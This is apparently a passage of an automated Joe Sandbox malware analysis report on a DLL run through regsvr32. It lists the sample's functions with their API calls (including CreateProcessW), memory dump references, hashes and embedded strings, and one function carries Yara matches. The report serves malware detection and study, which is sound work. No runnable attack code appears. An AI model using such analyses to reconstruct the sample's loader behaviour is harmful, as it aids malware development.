                                                                                                                                      • free.LIBCMT ref: 00007FFC67204E97
                                                                                                                                      • _errno.LIBCMT ref: 00007FFC67204E9C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1264244385-0
                                                                                                                                      • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                      • Instruction ID: bb400c60e521675ad09fee0f352d75567c7a930b51f58f4d154e0bfb45bca795
                                                                                                                                      • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                      • Instruction Fuzzy Hash: 1151E13190C6AAC2E3509B67A464279B7A1FF95B5CF148A36DA5E43395CF3CE441C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 502529563-0
                                                                                                                                      • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                      • Instruction ID: 40a67b19b919c9bf4a768d06eed2393dfe88d2fc4d850b129de47848f3aabd0b
                                                                                                                                      • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                      • Instruction Fuzzy Hash: FF115420A0D66AC5FA545BA3E46C2792390EF84798F045930EA1E077D2EE7CE480C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                                                                                      • String ID: vb4vcW2kAW3Twaz?30
                                                                                                                                      • API String ID: 254689257-4179232793
                                                                                                                                      • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                      • Instruction ID: 46ce5331c01a712f5fedbf04338f71c4686baa88d8e668889485e5b24ffe70dc
                                                                                                                                      • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                      • Instruction Fuzzy Hash: D921F73160CAD9C6D320CB15E4643A977A5FF88748F008935D78D87765DF7D9541CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00007FFC672036F0: _initp_misc_winsig.LIBCMT ref: 00007FFC67203729
                                                                                                                                        • Part of subcall function 00007FFC672036F0: EncodePointer.KERNEL32(?,?,?,00007FFC67202FAB,?,?,?,00007FFC67202179), ref: 00007FFC67203745
                                                                                                                                      • FlsAlloc.KERNEL32(?,?,?,00007FFC67202179), ref: 00007FFC67202FBB
                                                                                                                                        • Part of subcall function 00007FFC67203108: Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFC67202179), ref: 00007FFC67202FEC
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFC67203000
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 54287522-0
                                                                                                                                      • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                                      • Instruction ID: e880dbe3458ca229bb15b979c1c82b7522b2d3523eb97fabb324f71dd8c46723
                                                                                                                                      • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                                      • Instruction Fuzzy Hash: 28012C60A0D52BC5FA14EB73986977963A1BF05728F040E38D62D862E2EE2CA485D230
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 618 180001bdc-180001cab call 1800142a0 621 180001d21-180001d64 CreateProcessW 618->621 622 180001cad-180001d1b call 18000dd70 618->622 622->621
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcess
                                                                                                                                      • String ID: :}
                                                                                                                                      • API String ID: 963392458-2902022129
                                                                                                                                      • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                                      • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                                                                                      • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                                      • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitProcess
                                                                                                                                      • String ID: JKvDDasqwOPvGXZdqW
                                                                                                                                      • API String ID: 621844428-4059861069
                                                                                                                                      • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                                      • Instruction ID: 9ea0e3423afb2ff24d0febdba066af2ff2f84425a3cd058d05f90d48a54f8496
                                                                                                                                      • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                                      • Instruction Fuzzy Hash: 57D0A76190CB81C1D6209711F81435A23A0FFC834CFC00530D6CC46314CF7CC115C750
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _errno.LIBCMT ref: 00007FFC67206D0F
                                                                                                                                        • Part of subcall function 00007FFC672066D8: DecodePointer.KERNEL32 ref: 00007FFC672066FF
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFC6720313B,?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF), ref: 00007FFC67206D58
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateDecodeHeapPointer_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 15861996-0
                                                                                                                                      • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                                      • Instruction ID: 7aeb818e277745e66dd9114f5156d892382d24fd5e7fb9b2524fed4950196bf6
                                                                                                                                      • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                                      • Instruction Fuzzy Hash: D611C825B0C16AC6FB554B27E6AC37963A19F407DCF084D34DA1D07AC4EE6CA490C630
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _initp_misc_winsig.LIBCMT ref: 00007FFC67203729
                                                                                                                                        • Part of subcall function 00007FFC6720755C: EncodePointer.KERNEL32(?,?,?,?,00007FFC6720373E,?,?,?,00007FFC67202FAB,?,?,?,00007FFC67202179), ref: 00007FFC67207567
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFC67202FAB,?,?,?,00007FFC67202179), ref: 00007FFC67203745
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer$_initp_misc_winsig
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 190222155-0
                                                                                                                                      • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                      • Instruction ID: 0f2ed8e884fe95bf518accbde7fd7e9d0c3fcc6e386785ea31fa0d2eda8650fe
                                                                                                                                      • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                      • Instruction Fuzzy Hash: F7F09210E8D26BC0EC18FB63287A0B813401F96B88F592834E80E0A393DD2CE581C374
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$CreateInformation
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1774340351-0
                                                                                                                                      • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                      • Instruction ID: 85cc39ddd20b28d4e43da1bcd66da92681fb55486460c9e5a5d5c6d01fcd0e5f
                                                                                                                                      • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                      • Instruction Fuzzy Hash: 9BE04FB5F297A1C2E799DB22E8297656390FF99344F90A839EB4E02794DF3CD045CB10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFC672034AF,?,?,?,00007FFC672021CB), ref: 00007FFC6720740D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2118026453-0
                                                                                                                                      • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                      • Instruction ID: 338cd767fec27b350f621300f6ad7dd41a43a8f82d4a299b143cfa0310a47c2b
                                                                                                                                      • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                      • Instruction Fuzzy Hash: E4D05B32F5C655C1DF148B22F5A416C23A4EF84798F58C031D65C07745DD3CC496C720
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1068366078-0
                                                                                                                                      • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                      • Instruction ID: 6e3901fc6abe059b7c4403ac97311ee68a6b028d7a6cfff1a2308d9398c229c4
                                                                                                                                      • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                      • Instruction Fuzzy Hash: 5E01A222B28BA9C6EA448B17E864029B7A1FF88FD4F081535EF5D03B51DF39E891C710
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00007FFC67206C34: _FF_MSGBANNER.LIBCMT ref: 00007FFC67206C64
                                                                                                                                        • Part of subcall function 00007FFC67206C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC672030C0,?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3), ref: 00007FFC67206C89
                                                                                                                                        • Part of subcall function 00007FFC67206C34: _errno.LIBCMT ref: 00007FFC67206CAD
                                                                                                                                        • Part of subcall function 00007FFC67206C34: _errno.LIBCMT ref: 00007FFC67206CB8
                                                                                                                                      • Sleep.KERNEL32(?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8), ref: 00007FFC672030D2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$AllocateHeapSleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4153772858-0
                                                                                                                                      • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                      • Instruction ID: e53655927dc9d6eb10ffd539a69eb8981fddb6d8b5580df9b1ed71e31578b113
                                                                                                                                      • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                      • Instruction Fuzzy Hash: DDF0FF32A0D699C6EA009B23E06002973A1FF84B94F480538EA5D03B52DF3DE892C710
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1446610345-0
                                                                                                                                      • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                      • Instruction ID: e29c06c3d9affe1cb9874b95974d86482425fe2ccf914751977bcec80def537f
                                                                                                                                      • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                      • Instruction Fuzzy Hash: DBF1C232A0C6A9CAE7248F2694641BA77E1FF4479CF144A35EA5D47B94DF3CE940C720
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                                                                                      • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                                                      • API String ID: 1558914745-1064046199
                                                                                                                                      • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                      • Instruction ID: 64d3d6b6e0ab2114531191481ec21cca632fa9be0b5e849cf0c9b805b2dcb963
                                                                                                                                      • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                      • Instruction Fuzzy Hash: D1316E65B0C66AC6FB14EB67A86927923D0AF89798F144C34EA0D47792EE3CE544C630
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                                                                                      • String ID: Norwegian-Nynorsk
                                                                                                                                      • API String ID: 2273835618-461349085
                                                                                                                                      • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                      • Instruction ID: ad5a468f9c255d94c2668f73cc4a9e61135db196cbec5f332ad3f45090f32d0f
                                                                                                                                      • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                      • Instruction Fuzzy Hash: E96160A2A0C66AC6FB659F22D4683B92790FF45F48F084A35DA4D462D5DF7CE980C334
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FormatTime$__ascii_stricmpfree
                                                                                                                                      • String ID: a/p$am/pm
                                                                                                                                      • API String ID: 2252689280-3206640213
                                                                                                                                      • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                      • Instruction ID: 82ff2bf32209b3681f7d0bb44ef2c8f8502ee3f1447a8e13f735aff0a09191f9
                                                                                                                                      • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                      • Instruction Fuzzy Hash: F8F1032691C6BAC6E7758F26887C17C67A1FF0478CF449836EA9D43A85CE3CA854C331
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC67207194,?,?,?,?,00007FFC67206C69,?,?,00000000,00007FFC672030C0), ref: 00007FFC67206FCF
                                                                                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFC67207194,?,?,?,?,00007FFC67206C69,?,?,00000000,00007FFC672030C0), ref: 00007FFC672070DB
                                                                                                                                      • WriteFile.KERNEL32 ref: 00007FFC67207115
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
